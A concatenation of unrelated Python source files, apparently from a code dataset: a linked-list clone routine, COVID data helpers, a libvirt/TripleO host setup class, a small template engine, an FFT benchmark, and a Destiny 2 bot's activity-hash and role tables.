current_node = current_node.next
return clone_head
def copyPointers(self, original, clone):
ptr0 = ptr1 = original
ptr2 = clone
while ptr1 and ptr2:
ptr0 = ptr1
ptr1 = ptr1.next
ptr0.next = ptr2
ptr2.arb = ptr0.arb
ptr2 = ptr2.next
return original, clone
def makePointers(self, original, clone):
ptr1 = clone
while ptr1:
ptr1.arb = ptr1.arb.arb.next
ptr1 = ptr1.next
return clone
def copyList(self, head):
if not head and not head.next:
return head
clone_head = self.cloneList(head)
head, clone_head = self.copyPointers(head, clone_head)
return self.makePointers(head, clone_head)
h1 = Node(1)
h2 = Node(2)
h3 = Node(3)
h1.next = h2
h2.next = h3
h1.arb = h3
h3.arb = h2
h2.arb = h1
s = Solution()
x = s.copyList(h1)
class MyDictionary(dict):
# __init__ function
def __init__(self):
super().__init__()
self = dict()
# Function to add key:value
def add(self, key, value):
# Adding Values to dictionary
self[key] = value
class Solution:
def copyList(self, head):
if not head and not head.next:
return head
self.head = head
return self.clone()
def clone(self):
# Initialize two references, one
# with original list's head.
original = self.head
clone = None
# Initialize two references, one
# with original list's head.
mp = MyDictionary()
# Traverse the original list and
# make a copy of that
# in the clone linked list
while original is not None:
clone = Node(original.data)
mp.add(original, clone)
original = original.next
# Adjusting the original
# list reference again.
original = self.head
# Traversal of original list again
# to adjust the next and arb
# references of clone list using hash map.
while original is not None:
clone = mp.get(original)
clone.next = mp.get(original.next)
clone.arb = mp.get(original.arb)
original = original.next
# Return the head reference of the clone list.
return self.head | StarcoderdataPython |
8199977 | <reponame>magostin/coronavirus
import pandas as pd
def add_calc(x):
d = {}
d['nuovi_deceduti'] = x.deceduti.diff()
d['nuovi_tamponi'] = x.tamponi.diff()
d['nuovi_casi_testati'] = x.casi_testati.diff()
d['incremento'] = 100.0 * x['nuovi_positivi'] / x['totale_positivi']
d['percentuale_positivi'] = 100.0 * x['totale_casi'] / x['casi_testati']
d['percentuale_nuovi_positivi'] = 100.0 * x['nuovi_positivi'] / d['nuovi_tamponi']
d['percentuale_nuovi_positivi'] = d['percentuale_nuovi_positivi'].mask(d['percentuale_nuovi_positivi'] > 50).mask(d['percentuale_nuovi_positivi'] < 0)
d['letalita'] = 100.0 * x.deceduti / x.totale_casi
return pd.DataFrame(d)
def calculate_per_1M_pop(df):
df['totale_casi_per_1M_pop'] = 1e6 * df.totale_casi / df.popolazione
df['deceduti_per_1M_pop'] = 1e6 * df.deceduti / df.popolazione
df['nuovi_deceduti_per_1M_pop'] = 1e6 * df.nuovi_deceduti / df.popolazione
df['nuovi_deceduti_per_1M_pop'] = df['nuovi_deceduti_per_1M_pop'].mask(df['nuovi_deceduti_per_1M_pop'] < 0)
df['nuovi_positivi_per_1M_pop'] = 1e6 * df.nuovi_positivi / df.popolazione
return df
def prov_per_1M_pop(df):
df['nuovi_positivi'] = df.groupby('provincia').totale_casi.diff()
df['incremento'] = 100.0 * df['nuovi_positivi'] / df['totale_casi']
df['totale_casi_per_1M_pop'] = 1e6 * df.totale_casi / df.popolazione
df['nuovi_positivi_per_1M_pop'] = 1e6 * df.nuovi_positivi / df.popolazione
return df
| StarcoderdataPython |
248290 | <gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rdomhelper.server import Server
from rdomhelper.undercloud import Undercloud
from jinja2 import Environment
from jinja2 import FileSystemLoader
class Host0(Server):
def __init__(self, **kwargs):
Server.__init__(self, **kwargs)
def deploy_hypervisor(self):
self.run('yum install -y libvirt-daemon-driver-nwfilter libvirt-client libvirt-daemon-config-network libvirt-daemon-driver-nodedev libvirt-daemon-kvm libvirt-python libvirt-daemon-config-nwfilter libvirt-glib libvirt-daemon libvirt-daemon-driver-storage libvirt libvirt-daemon-driver-network libvirt-devel libvirt-gobject libvirt-daemon-driver-secret libvirt-daemon-driver-qemu libvirt-daemon-driver-interface libguestfs-tools.noarch virt-install genisoimage openstack-tripleo libguestfs-tools instack-undercloud')
self.run('sed -i "s,#auth_unix_rw,auth_unix_rw," /etc/libvirt/libvirtd.conf')
self.run('systemctl start libvirtd')
self.run('systemctl status libvirtd')
self.run('mkdir -p /home/stack/DIB')
self.run('find /etc/yum.repos.d/ -type f -exec cp -v {} /home/stack/DIB \;')
self.install_base_packages()
self.clean_system()
self.update_packages()
def instack_virt_setup(self, guest_image_path, guest_image_checksum,
rhsm_login=None, rhsm_password=None):
self.run('sysctl net.ipv4.ip_forward=1')
self.fetch_image(path=guest_image_path, checksum=guest_image_checksum, dest='/home/stack/guest_image.qcow2',
user='stack')
# NOTE(Gonéri): this is a hack for our OpenStack, the MTU of its outgoing route
# is 1400 and libvirt do not provide a mechanism to adjust the guests MTU.
self.run("LIBGUESTFS_BACKEND=direct virt-customize -a /home/stack/guest_image.qcow2 --run-command 'echo MTU=\"1400\" >> /etc/sysconfig/network-scripts/ifcfg-eth0'")
env = Environment()
env.loader = FileSystemLoader('templates')
template = env.get_template('virt-setup-env.j2')
virt_setup_env = template.render(
{
'dib_dir': '/home/stack/DIB',
'node': {
'count': 3,
'mem': 4096,
'cpu': 2
},
'undercloud_node_mem': 4096,
'guest_image_name': '/home/stack/guest_image.qcow2',
'rhsm': {
'user': rhsm_login,
'password': <PASSWORD>
}})
self.create_file('virt-setup-env', virt_setup_env, user='stack')
self.run('source virt-setup-env; instack-virt-setup', user='stack')
undercloud_ip = self.run(
'/sbin/ip n | grep $(tripleo get-vm-mac instack) | awk \'{print $1;}\'',
user='stack')[0]
undercloud = Undercloud(undercloud_ip,
via_ip=self._hostname,
user='root',
key_filename=self._key_filename)
return undercloud
| StarcoderdataPython |
3422121 | from __future__ import absolute_import, unicode_literals
import re
import asteval
import yaml
VAR_RE = r"[_a-zA-Z][a-zA-Z0-9_]*"
EXPRESSION_RE = r"[\[\]():.a-zA-Z0-9_]*"
PRINT_RE = r"{{ *(.+?) *}}"
START_BLOCK_RE = r"{% *(if|for) +(.+?) *%}"
END_BLOCK_RE = r"{% *end(for|if) *%}"
FOR_RE = r"{{% *for +({varname}) +in +([^%]+) *%}}".format(varname=VAR_RE, expression=EXPRESSION_RE)
IF_RE = r"{% *if +(.+?) *%}"
BLOCK_RE = r"{% *block +(.+?) *%}((?:.|\n)+?){% *endblock *%}"
INCLUDE_RE = r"{% *include +(.+?) *%}"
class Template(object):
def __init__(self, template):
self.template = template
self.clean_template = None
self.blocks = {}
@classmethod
def from_file(cls, filename):
with open(filename) as f:
front_matter, body = f.read().strip("-\n").split("---", 2)
front_matter = yaml.load(front_matter)
template = cls(body)
template.__dict__.update(front_matter)
return template
def render(self, **vars):
if self.clean_template is None:
self._get_blocks()
return self._expand(self.clean_template, **vars)
def render_block(self, block, **vars):
if self.clean_template is None:
self._get_blocks()
return self._expand(self.blocks[block], **vars)
def _eval_context(self, vars):
e = asteval.Interpreter(symtable=vars, use_numpy=False, writer=None)
e.symtable['__last_iteration'] = vars.get("__last_iteration", False)
return e
def _get_blocks(self):
def s(match):
name, contents = match.groups()
self.blocks[name] = self._strip_single_nl(contents)
return ""
self.clean_template = re.sub(BLOCK_RE, s, self.template, flags=re.MULTILINE)
def _expand(self, template, **vars):
stack = sorted(
[(m.start(), 1, m.groups()[0]) for m in re.finditer(START_BLOCK_RE, template)] +
[(m.end(), -1, m.groups()[0]) for m in re.finditer(END_BLOCK_RE, template)]
)
last_nesting, nesting = 0, 0
start = 0
result = ""
block_type = None
if not stack:
return self._expand_vars(template, **vars)
for pos, indent, typ in stack:
nesting += indent
if nesting == 1 and last_nesting == 0:
block_type = typ
result += self._expand_vars(template[start:pos], **vars)
start = pos
elif nesting == 0 and last_nesting == 1:
if block_type == "if":
result += self._expand_cond(template[start:pos], **vars)
elif block_type == "for":
result += self._expand_loops(template[start:pos], **vars)
elif block_type == "block":
result += self._save_block(template[start:pos], **vars)
start = pos
last_nesting = nesting
result += self._expand_vars(template[stack[-1][0]:], **vars)
return result
def _expand_vars(self, template, **vars):
safe_eval = self._eval_context(vars)
expanded = re.sub(INCLUDE_RE, lambda m: self.render_block(m.groups()[0], **vars), template)
return re.sub(PRINT_RE, lambda m: str(safe_eval(m.groups()[0])), expanded)
def _expand_cond(self, template, **vars):
start_block = re.search(IF_RE, template, re.M)
end_block = list(re.finditer(END_BLOCK_RE, template, re.M))[-1]
expression = start_block.groups()[0]
sub_template = self._strip_single_nl(template[start_block.end():end_block.start()])
safe_eval = self._eval_context(vars)
if safe_eval(expression):
return self._expand(sub_template)
return ""
def _strip_single_nl(self, template, strip_r=True):
if template[0] == "\n":
template = template[1:]
if strip_r and template[-1] == "\n":
template = template[:-1]
return template
def _expand_loops(self, template, **vars):
start_block = re.search(FOR_RE, template, re.M)
end_block = list(re.finditer(END_BLOCK_RE, template, re.M))[-1]
var_name, iterator = start_block.groups()
sub_template = self._strip_single_nl(template[start_block.end():end_block.start()], strip_r=False)
safe_eval = self._eval_context(vars)
result = ''
items = safe_eval(iterator)
for idx, var in enumerate(items):
vars[var_name] = var
vars['__last_iteration'] = idx == len(items) - 1
result += self._expand(sub_template, **vars)
del vars[var_name]
return self._strip_single_nl(result)
| StarcoderdataPython |
4887397 | """
Execution of fft.py
"""
import math
import gc
from pyske.core import PList, par
from pyske.core import Timing
from pyske.examples.list import util
from pyske.examples.list.fft import fft
# -------------- Execution --------------
def _is_power_of_2(num: int) -> bool:
return num == round(2 ** (math.log2(num)))
def _main():
size, num_iter, _ = util.standard_parse_command_line(data_arg=False)
assert _is_power_of_2(size), "The size should be a power of 2."
assert _is_power_of_2(len(par.procs())), "The number of processors should be a power of 2."
input_list = PList.init(lambda _: 1.0, size)
timing = Timing()
gc.disable()
for iteration in range(1, 1 + num_iter):
timing.start()
result = fft(input_list)
timing.stop()
gc.collect()
result = result.to_seq()[0]
util.print_experiment(result, timing.get(), par.at_root, iteration)
if __name__ == '__main__':
_main()
| StarcoderdataPython |
251844 | from ElevatorBot.database.database import getGrandmasterHashes
# from https://data.destinysets.com/
# raids
from ElevatorBot.backendNetworking.event_loop import get_asyncio_loop
spirePHashes = [3213556450]
spireHashes = [119944200]
eaterPHashes = [809170886]
eaterHashes = [3089205900]
# there is a hash for each levi-rotation and one for each possible prestige modifier
leviHashes = [2693136600, 2693136601, 2693136602, 2693136603, 2693136604, 2693136605]
leviPHashes = [
417231112,
508802457,
757116822,
771164842,
1685065161,
1800508819,
2449714930,
3446541099,
3857338478,
3879860661,
3912437239,
4206123728,
]
scourgeHashes = [548750096]
lwHashes = [2122313384]
cosHashes = [3333172150, 960175301]
gosHashes = [2659723068, 2497200493, 3458480158, 3845997235]
dscHashes = [910380154, 3976949817]
vogHashes = [1485585878, 3711931140, 3881495763]
vogMasterHashes = [1681562271]
# dungeons
throneHashes = [1893059148, 2032534090]
pitHashes = [1375089621, 2559374368, 2559374374, 2559374375]
prophHashes = [1077850348, 4148187374]
harbHashes = [
1738383283,
]
presageHashes = [
2124066889,
]
presageMasterHashes = [
4212753278,
]
# menagerie
premenHashes = [2509539864, 2509539865, 2509539867, 1831470693, 3107795800, 3115455134]
# secret missions
whisperHashes = [74501540]
herwhisperHashes = [1099555105]
zeroHashes = [3232506937]
herzeroHashes = [2731208666]
# nightfalls
loop = get_asyncio_loop()
gmHashes = loop.run_until_complete(getGrandmasterHashes())
# activityTypeHashes
activityStoryHash = [147238405, 1686739444, 1299744814, 2201105581, 2911768360]
activityRaidHash = [2043403989]
activityDungeonHash = [608898761]
activityGambitHash = [636666746, 1418469392, 2490937569] # will probly change with BL
activityNFHash = [575572995]
activityStrikeHash = [2884569138, 2884569138, 4110605575, 4110605575, 4164571395]
activityPrivateMatchHash = [4260058063]
activityPVPHash = [
96396597,
158362448,
517828061,
964120289,
1434366740,
1472571612,
1522227381,
2112637710,
2175955486,
2278747016,
2371050408,
2394267841,
2410913661,
2505748283,
3252144427,
3268478079,
3517186939,
3610972626,
3954711135,
3956087078,
3956381302,
3990775146,
4141415314,
4288302346,
]
activityLighthouseHash = [4276116472]
# Metric hashes
metricLeviCompletions = [2486745106]
metricEoWCompletions = [2659534585]
metricSosCompletions = [700051716]
metricLWCompletions = [905240985]
metricScourgeCompletions = [1201631538]
metricCoSCompletions = [1815425870]
metricGoSCompletions = [1168279855]
metricRaidAllocation = {
tuple(eaterHashes): metricEoWCompletions,
tuple(spireHashes): metricSosCompletions,
tuple(scourgeHashes): metricScourgeCompletions,
tuple(cosHashes): metricCoSCompletions,
tuple(lwHashes): metricLWCompletions,
tuple(gosHashes): metricGoSCompletions,
}
metricWinStreakGambitWeekly = [1053579811]
metricWinStreakCrucibleWeekly = [4044111774]
metricWinStreakWeeklyAllocation = {
tuple(activityGambitHash): metricWinStreakGambitWeekly,
tuple(activityPVPHash): metricWinStreakCrucibleWeekly,
}
# seasonal challenges hashes
seasonalChallengesCategoryHash = 3443694067
""" Grouped Hashes """
# only activities which are available should be included here
availableRaidHashes = [lwHashes, gosHashes]
raidHashes = availableRaidHashes + [
leviHashes,
leviPHashes,
eaterHashes,
eaterPHashes,
spireHashes,
spirePHashes,
scourgeHashes,
cosHashes,
]
availableDungeonHashes = [throneHashes, pitHashes, prophHashes]
activityStrikeAndNFHash = activityNFHash + activityStrikeHash
metricAvailableRaidCompletion = metricLWCompletions + metricGoSCompletions
metricRaidCompletion = (
metricAvailableRaidCompletion
+ metricLeviCompletions
+ metricEoWCompletions
+ metricSosCompletions
+ metricScourgeCompletions
+ metricCoSCompletions
)
"""" Speedrun Times: 2x WR for now https://www.speedrun.com/destiny2"""
# has to be tuples bc lists are not hashable
speedrunActivitiesRaids = {
tuple(scourgeHashes): 648, # scourge
tuple(cosHashes): 1118, # cos
tuple(lwHashes): 720, # lw doesn't have a time, so 12mins it is
tuple(gosHashes): 1496, # gos
}
# consists of all of them
speedrunActivities = speedrunActivitiesRaids
""" Weapon Hashes """
damageTypeKinetic = 3373582085
damageTypeSolar = 1847026933
damageTypeVoid = 3454344768
damageTypeArc = 2303181850
weaponTypeKinetic = 1498876634
weaponTypeEnergy = 2465295065
weaponTypePower = 953998645
possibleWeaponsKinetic = [
"Hand Cannon",
"Scout Rifle",
"Auto Rifle",
"Pulse Rifle",
"Sidearm",
"Submachine Gun",
"Combat Bow",
"Sniper Rifle",
"Shotgun",
"Grenade Launcher",
]
possibleWeaponsEnergy = [
"Hand Cannon",
"Scout Rifle",
"Auto Rifle",
"Pulse Rifle",
"Sidearm",
"Fusion Rifle",
"Shotgun",
"Sniper Rifle",
"Trace Rifle",
"Grenade Launcher",
"Combat Bow",
]
possibleWeaponsPower = [
"Grenade Launcher",
"Rocket Launcher",
"Linear Fusion Rifle",
"Sword",
"Shotgun",
"Machine Gun",
"Sniper Rifle",
]
clanids = {4107840: "The Descend"}
discord_channels = {
"general": 670400011519000616,
"media": 670400027155365929,
"spoilerchat": 670402166103474190,
"offtopic": 670362162660900895,
}
requirementHashes = {
"Y1": {
"Spire of Stars": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": spireHashes + spirePHashes}, # normal
],
"replaced_by": ["Spire of Stars Master", "Y1 Raid Master"],
},
"Spire of Stars Master": {
"deprecated": True,
"requirements": ["clears", "flawless"],
"clears": [{"count": 10, "actHashes": spirePHashes}], # prestige
"flawless": spireHashes + spirePHashes,
"replaced_by": ["Y1 Raid Master"],
},
"Eater of Worlds": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": eaterHashes + eaterPHashes}, # normal
],
"replaced_by": ["Eater of Worlds Master", "Y1 Raid Master"],
},
"Eater of Worlds Master": {
"deprecated": True,
"requirements": ["clears", "flawless"],
"clears": [{"count": 10, "actHashes": eaterPHashes}], # prestige
"flawless": eaterHashes + eaterPHashes,
"replaced_by": ["Y1 Raid Master"],
},
"Leviathan": {
"deprecated": True,
"requirements": ["clears"],
"clears": [
{"count": 4, "actHashes": leviHashes + leviPHashes}, # normal
],
"replaced_by": ["Leviathan Master", "Y1 Raid Master"],
},
"Leviathan Master": {
"deprecated": True,
"requirements": ["clears", "flawless", "collectibles"],
"clears": [
{"count": 10, "actHashes": leviPHashes}, # prestige
],
"flawless": leviHashes + leviPHashes,
"collectibles": [
3125541834, # 1766893932, #good dog
3125541835, # 1766893933, #splish splash
3125541833, # 1766893935, #two enter, one leaves
3125541832, # 1766893934 #take the throne
],
"replaced_by": ["Y1 Raid Master"],
},
"Y1 Raid Master": {
"deprecated": True,
"requirements": ["roles"],
"roles": [
"Spire of Stars Master",
"Eater of Worlds Master",
"Leviathan Master",
],
},
},
# TODO anything above here has unchecked hashes
"Y2": {
"Crown of Sorrow": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": cosHashes}], # • Minimum 15 full clears
"records": [
3308790634, # Limited Blessings
3308790637, # Total Victory
3308790636, # With Both Hands
],
"replaced_by": ["Y2 Raid Master", "Crown of Sorrow Master"],
},
"Crown of Sorrow Master": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 30, "actHashes": cosHashes}], # Minimum 15 full clears
"records": [
3292013042, # Crown of Ease [Flawless]
3292013043, # Arc Borne :Arc:
3292013040, # Void Borne :Void:
3292013041, # Solar Borne :Solar:
3292013054, # Stay Classy [Same Class]
],
"replaced_by": ["Y2 Raid Master"],
},
"Scourge of the Past": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": scourgeHashes}],
"records": [
223175561, # All For One, One For All
1180238715, # Hold the Line
132377266, # To Each Their Own
974101911, # Fast and unwieldy
],
"replaced_by": ["Y2 Raid Master", "Scourge of the Past Master"],
},
"Scourge of the Past Master": {
"deprecated": True,
"requirements": ["clears", "records"],
"clears": [{"count": 30, "actHashes": scourgeHashes}],
"records": [
2925485370, # Like a Diamond
# Can't check since not in the api (probably)
# 772878705, #Solarstruck
# 496309570, #Voidstruck
# 105811740, #Thunderstruck
# 3780682732, #Stay Classy
],
"replaced_by": ["Y2 Raid Master"],
},
"Last Wish": {
"requirements": ["clears", "records"],
"clears": [
{"count": 15, "actHashes": lwHashes}, # Minimum 15 full clears
],
"records": [
1847670729, # Summoning Ritual
3533973498, # Coliseum Champion
989244596, # Forever Fight
3234595894, # Keep Out
1711136422, # Strength of Memory
],
"replaced_by": ["Y2 Raid Master", "Last Wish Master"],
},
"Last Wish Master": {
"requirements": ["clears", "records", "roles"],
"roles": ["Last Wish"],
"clears": [{"count": 30, "actHashes": lwHashes}], # Minimum 15 full clears
"records": [
380332968, # Petra's Run [Flawless]
3000516033, # Thunderstruck :Arc:
342038729, # The New Meta [Same Class]
2826160801, # Night Owl :Void:
2588923804, # Winter's Rest :Stasis:
623283604, # Sunburn :Solar:
],
"replaced_by": ["Y2 Raid Master"],
},
"Y2 Raid Master": {
"requirements": ["roles"],
"roles": [
"Last Wish Master",
"Scourge of the Past Master",
"Crown of Sorrow Master",
],
},
},
"Y3": {
"Garden of Salvation": {
"requirements": ["clears", "records"],
"clears": [{"count": 15, "actHashes": gosHashes}], # Minimum 15 full clears
"records": [
3719309782, # Leftovers
637935773, # A Link to the Chain
2381358572, # To the Top
2191554152, # Zero to One Hundred
],
"replaced_by": ["Garden of Salvation Master", "Y3 Raid Master"],
},
"Garden of Salvation Master": {
"requirements": ["clears", "records", "roles"],
"roles": ["Garden of Salvation"],
"clears": [{"count": 30, "actHashes": gosHashes}], # Minimum 30 full clears
"records": [
1522774125, # Inherent Perfection [Flawless]
3427328428, # Fluorescent Foliage :Arc:
277137394, # Shade in the Garden :Void:
2571794337, # Photosynthesis :Solar:
2629178011, # Frost on the leaves :Stasis:
1830799772, # Garden Party [Same Class]
4105510833, # Voltaic Tether
44547560, # Repulsion Theory
3860668859, # Relay Rally
3949104239, # Stop Hitting Yourself
],
"replaced_by": ["Y3 Raid Master"],
},
"Y3 Raid Master": {
"requirements": ["roles"],
"roles": ["Garden of Salvation Master"],
},
},
"Y4": {
"Deep Stone Crypt": {
"requirements": ["clears", "records"],
"clears": [
{"count": 15, "actHashes": dscHashes}, # Minimum 15 full clears
],
"records": [
22094034, # Red Rover Challenge
64856166, # Copies of Copies Challenge
337542929, # Of All Trades Challenge
2530940166, # The Core Four Challenge
],
"replaced_by": ["Deep Stone Crypt Master"],
},
"Deep Stone Crypt Master": {
"requirements": ["roles", "clears", "records"],
"roles": ["Deep Stone Crypt"],
"clears": [{"count": 30, "actHashes": dscHashes}], # Minimum 30 full clears
"records": [
3560923614, # Survival of the Fittest [Flawless]
134885948, # Not a Scratch
4216504853, # Resource Contention
3771160417, # 5 Seconds to Paradise
1277450448, # Short Circuit
1487317889, # Ready, Set, Go!
564366615, # Control Group [Same Class]
3834307795, # Electric Sheep :arc:
3200831458, # Meltdown :solar:
513707022, # Freezing Point :stasis:
3875695735, # Devoid of the Rest :void:
],
# 'replaced_by':[]
},
"Vault of Glass": {
"requirements": ["clears", "records"],
"clears": [
{
"count": 15,
"actHashes": vogHashes + vogMasterHashes,
}, # Minimum 15 full clears
],
"records": [
# challenges
706596766, # wait for it / conflux
1888851130, # the only oracle for you / oracles
154213552, # out of its way / templar
2464700601, # strangers in time / gatekeeper
1129667036, # ensemble's refrain / atheon
],
"replaced_by": ["Vault of Glass Master", "Vault of Glass Grandmaster"],
},
"Vault of Glass Master": {
"requirements": ["roles", "clears", "records"],
"roles": ["Vault of Glass"],
"clears": [{"count": 30, "actHashes": vogHashes + vogMasterHashes}], # Minimum 30 full clears
"records": [
2750088202, # Flawless Vault of Glass
1983700615, # Charged Glass (Arc)
2592913942, # Melted Glass (Solar)
1961032859, # Empty Glass (Void)
3969659747, # Vault of Class (same class)
874956966, # Break No Plates (lose no sync plates)
4170123161, # Dragon's Den (wyvern only with supers)
787552349, # Take Cover (Oracle no goblin kills)
3903615031, # Tempered Teleport (Never block teleport)
3106039192, # Rabid Relic (only relic super damage for praetorians)
1024875083, # Eyes on Atheon (don't kill supplicants)
],
"replaced_by": ["Vault of Glass Grandmaster"],
},
"Vault of Glass Grandmaster": {
"requirements": ["roles", "clears", "records"],
"roles": ["Vault of Glass", "Vault of Glass Master"],
"clears": [
{"count": 45, "actHashes": vogHashes + vogMasterHashes},
{"count": 15, "actHashes": vogMasterHashes},
],
"records": [
3790077074, # Maestro Glasser
],
},
},
"Dungeons": {
"Solo Flawless Shattered Throne": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": throneHashes,
},
"Flawless Shattered Throne": {
"requirements": ["records"],
"records": [
1178448425, # Curse This
],
"replaced_by": ["Solo Flawless Shattered Throne"],
},
"Solo Shattered Throne": {
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00", # KEKW
"endTime": "08/09/2020 18:00",
},
"records": [
3899996566, # Solo-nely
],
"replaced_by": ["Solo Flawless Shattered Throne"],
},
"Solo Flawless Pit of Heresy": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": pitHashes,
},
"Solo Pit of Heresy": {
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"records": {
3841336511, # Usurper
},
"replaced_by": ["Solo Flawless Pit of Heresy"],
},
"Flawless Pit of Heresy": {
"requirements": ["records"],
"records": {
245952203, # Eternal Heretic
},
"replaced_by": ["Solo Flawless Pit of Heresy"],
},
"Solo Prophecy": {
"requirements": ["records"],
"records": [3002642730],
"replaced_by": ["Solo Flawless Prophecy"],
},
"Flawless Prophecy": {
"requirements": ["records"],
"records": [2010041484],
"replaced_by": ["Solo Flawless Prophecy"],
},
"Solo Flawless Prophecy": {
"requirements": ["lowman", "records"],
"records": [3191784400], # Solo Flawless Prophecy
"playercount": 1,
"flawless": True,
"noCheckpoints": True,
"denyTime0": { # Beyond light boss CP bug
"startTime": "10/11/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "01/12/2020 18:00",
"endTime": "17/12/2020 18:00",
},
"activityHashes": prophHashes,
},
"Solo Harbinger": {
"requirements": ["records"],
"records": [3657275647], # Lone Harbinger
"replaced_by": ["Solo Flawless Harbinger"],
},
"Flawless Harbinger": {
"requirements": ["records"],
"records": [2902814383], # Immortal Harbinger
"replaced_by": ["Solo Flawless Harbinger"],
},
"Solo Flawless Harbinger": {
"requirements": ["records"],
"records": [3047181179], # Alpha Hunter
},
"Solo Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": False,
"activityHashes": presageHashes,
"replaced_by": [
"Solo Flawless Presage",
"Solo Master Presage",
"Solo Flawless Master Presage",
],
},
"Flawless Presage": {
"requirements": ["flawless"],
"flawless": presageHashes,
"replaced_by": [
"Solo Flawless Presage",
"Flawless Master Presage",
"Solo Flawless Master Presage",
],
},
"Solo Flawless Presage": {
"requirements": ["records"],
"records": [4206923617], # Lone Gun in a Dark Place
"replaced_by": ["Solo Flawless Master Presage"],
},
"Solo Master Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": False,
"activityHashes": presageMasterHashes,
"replaced_by": ["Solo Flawless Master Presage"],
},
"Flawless Master Presage": {
"requirements": ["records"],
"records": [2335417976], # Tale Told
"replaced_by": ["Solo Flawless Master Presage"],
},
"Solo Flawless Master Presage": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"activityHashes": presageMasterHashes,
},
},
"Lowmans": {
"Trio Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": eaterHashes + eaterPHashes,
"replaced_by": ["Solo Argos", "Duo Argos"],
},
"Duo Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": eaterHashes + eaterPHashes,
"replaced_by": ["Solo Argos"],
},
"Solo Argos": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": eaterHashes + eaterPHashes,
},
"Trio Insurrection": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": scourgeHashes,
"replaced_by": ["Duo Insurrection"],
},
"Duo Insurrection": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": scourgeHashes,
},
"Solo Queenswalk": {
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": lwHashes,
},
"Duo Queenswalk": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": lwHashes,
"replaced_by": ["Solo Queenswalk"],
},
"Trio Queenswalk": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": lwHashes,
"replaced_by": ["Solo Queenswalk", "Duo Queenswalk"],
},
"<NAME>": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": leviHashes + leviPHashes,
},
"Trio Gahlran": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": cosHashes,
"replaced_by": ["Duo Gahlran"],
},
"Duo Gahlran": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": cosHashes,
},
"Duo Sanctified Mind": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": gosHashes,
},
"Trio Sanctified Mind": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": gosHashes,
"replaced_by": ["Duo Sanctified Mind"],
},
"Trio Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": premenHashes,
"replaced_by": ["Duo Heroic Menagerie", "Solo Heroic Menagerie"],
},
"Duo Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": premenHashes,
"replaced_by": ["Solo Heroic Menagerie"],
},
"Solo Heroic Menagerie": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"activityHashes": premenHashes,
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": dscHashes,
"replaced_by": ["<NAME>"],
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": dscHashes,
},
"<NAME>": {
"requirements": ["lowman"],
"playercount": 3,
"activityHashes": vogHashes + vogMasterHashes,
"replaced_by": ["Duo Atheon"],
},
"D<NAME>": {
"requirements": ["lowman"],
"playercount": 2,
"activityHashes": vogHashes + vogMasterHashes,
},
},
"Addition": {
"<NAME>": {
"deprecated": True,
"requirements": ["collectibles"],
"collectibles": [
3531075476, # Armory Forged Shell
],
},
"The Other Side": {
"deprecated": True,
"requirements": ["records"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"records": [
1662610173, # Only the essentials
],
},
"Solo Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"activityHashes": zeroHashes,
